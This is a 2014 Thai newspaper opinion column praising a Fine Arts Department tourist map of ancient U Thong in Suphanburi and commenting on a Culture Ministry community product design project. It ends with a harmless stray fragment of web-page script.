มติชนรายวัน ฉบับประจำวันพฤหัสบดีที่ 15 พฤษภาคม  2557

 

ทอดน่องท่องเที่ยว อู่ทอง สุพรรณ

          แผนที่ท่องเที่ยวเมืองอู่ทอง เป็นงานสร้างสรรค์สิ่งดีๆ วิเศษๆ ที่กรมศิลปากรพิมพ์แจกในงานแบ่งปันความรู้สู่ชุมชน ตอนเย็นพฤหัสบดีที่ 15 พฤษภาคม วันนี้

          ต้องยกย่องชื่นชมเป็นพิเศษต่ออธิบดีกรมศิลปากร เอนก สีหามาตย์ เพราะกล้าทำมาแจกจ่ายแบ่งปันสู่ชุมชนและคนทั่วไปไม่จำกัด

          แผนที่ท่องเที่ยวเมืองอู่ทองแผ่นนี้ ควบคุมการผลิตโดย อ. ศิริพจน์  เหล่ามานะเจริญ  ผู้เดินทางทอดน่องท่องสำรวจแหล่งโบราณคดีเกือบทุกยอดเขาที่พบวัฒนธรรมหินตั้ง ในอาณาบริเวณเมืองอู่ทอง แล้วเขียนคำอธิบายย่อๆพิมพ์ไว้ด้านหลังแผนที่ด้วย

          เมืองโบราณทุกแห่งเป็นแหล่งท่องเที่ยวทางวัฒนธรรมที่มีคุณค่ามหาศาล

          เสียแต่ไม่มีแผนที่แจกคนเดินทางท่องเที่ยวที่อยากไปจุดสำคัญๆด้วยตัวเอง ไม่ว่าเดินทางทอดน่อง, ขี่จักรยาน, หรือนั่งรถยนต์

          ที่เคยมี (แต่ส่วนมากไม่แจกและไม่ขาย) คือแผนผังทางวิชาการที่คนทั่วไปดูไม่เป็น, ไม่สะดวก, ไม่สนุก

          กรมศิลปากรจะอยู่ร่วมในสังคมสมัยใหม่ได้ดีอย่างยิ่ง ถ้าผู้ปฏิบัติการมีวิธีคิดร่วมสมัย แล้วมีวิธีทำไม่ล้าสมัย

          ที่สำคัญคือ “เรียนรู้อดีต รับใช้ปัจจุบัน สร้างสรรค์อนาคต”

          ไม่ใช่เอาแต่ฟูมฟายงมงายอดีต แล้วเกณฑ์ให้คนอื่นทำตาม หากใครไม่ตามก็เป่านกหวีดไม่พอใจ

 

สร้างสรรค์ผลิตภัณฑ์ชุมชน

          โครงการออกแบบสร้างสรรค์ผลิตภัณฑ์ชุมชนสู่สากล ของสำนักงานศิลปวัฒนธรรมร่วมสมัย (สศร.) กระทรวงวัฒนธรรม (วธ.)

          เป็นโครงการดีมาก (ถ้าทำได้จริง) เพราะเท่ากับสร้างเพิ่มมูลค่าเชิงธุรกิจให้ผลิตภัณฑ์ชุมชนหรือโอทอป (โดยไม่จำเป็นต้องสร้างอัตลักษณ์ไทย)

          ขณะเดียวกันก็เปิดโอกาสให้นักออกแบบรุ่นใหม่ได้แสดงศักยภาพผ่านการประกวดออกแบบบรรจุภัณฑ์

          อย่างนี้มาถูกทาง และอยู่ในแนวทางเศรษฐกิจสร้างสรรค์ ที่ไทยจำเป็นต้องมี แล้วต้องทำต่อเนื่องตลอดกาลนานเหมือนประเทศก้าวหน้าในโลกทำมาก่อนแล้วทั้งนั้น เช่น อังกฤษ, ญี่ปุ่น, เกาหลี, ไต้หวัน, ฯลฯ

          หีบห่อสินค้าญี่ปุ่นมีพลังสูงมากจนคนตัดสินใจซื้ออย่างง่ายๆ เป็นที่รู้กันทั่วโลกมิใช่หรือ? แต่ไทยขาดมากสิ่งนี้

          วธ. เคยจัดงานประจำปีด้วยการเกณฑ์หน่วยงานในสังกัดออกร้านแสดงสินค้าวัฒนธรรม

          นั่นหลงทาง แล้วต่างก็รู้แก่ใจว่าไม่ได้ผล เพราะทำกันแบบลิงหลอกเจ้าเพื่อเอาใจเจ้านายด้วยผักชีโรยหน้า  ไม่ใช่เพื่อชุมชนจริงd.getElementsByTagName(‘head’)[0].appendChild(s);}